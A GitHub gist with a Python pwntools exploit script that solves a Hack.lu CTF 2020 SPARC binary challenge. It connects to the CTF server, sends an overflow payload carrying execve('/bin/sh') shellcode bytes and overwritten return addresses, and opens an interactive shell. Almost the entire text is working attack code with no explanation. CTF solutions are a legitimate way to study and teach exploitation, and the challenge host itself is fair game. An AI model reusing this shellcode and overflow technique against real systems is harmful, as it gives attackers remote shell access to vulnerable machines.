Skip to content

Instantly share code, notes, and snippets.

@farazsth98
Created October 26, 2020 10:04
Show Gist options
  • Save farazsth98/4e09731348bd5e494bd58e7af1e62131 to your computer and use it in GitHub Desktop.
Save farazsth98/4e09731348bd5e494bd58e7af1e62131 to your computer and use it in GitHub Desktop.
Secret Pwnhub Academy Awards Club 2 exploit script from Hack.lu CTF 2020 (ugly)
#!/usr/bin/env python3
from pwn import *
context.arch = "sparc"
elf = ELF("./sparc-2")
p = remote("flu.xxx", 2025)
shellcode = b"AA\x90\x90\xeb\x34\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xe0\x3b\xbf\xf0\xc0\x23\xbf\xf8\x90\x23\xa0\x10\xc0\x23\xbf\xec\xd0\x23\xbf\xe8\x92\x23\xa0\x18\x94\x22\x80\x0a\x82\x10\x20\x3b\x91\xd0\x20\x08\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
payload = b"1"*7 + b"3"*5
payload += b"4"
payload += b"\xff"
payload += shellcode
payload += b"A"*102
payload += p32(0xffffea00)
payload += p32(0xffffea68-8)
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment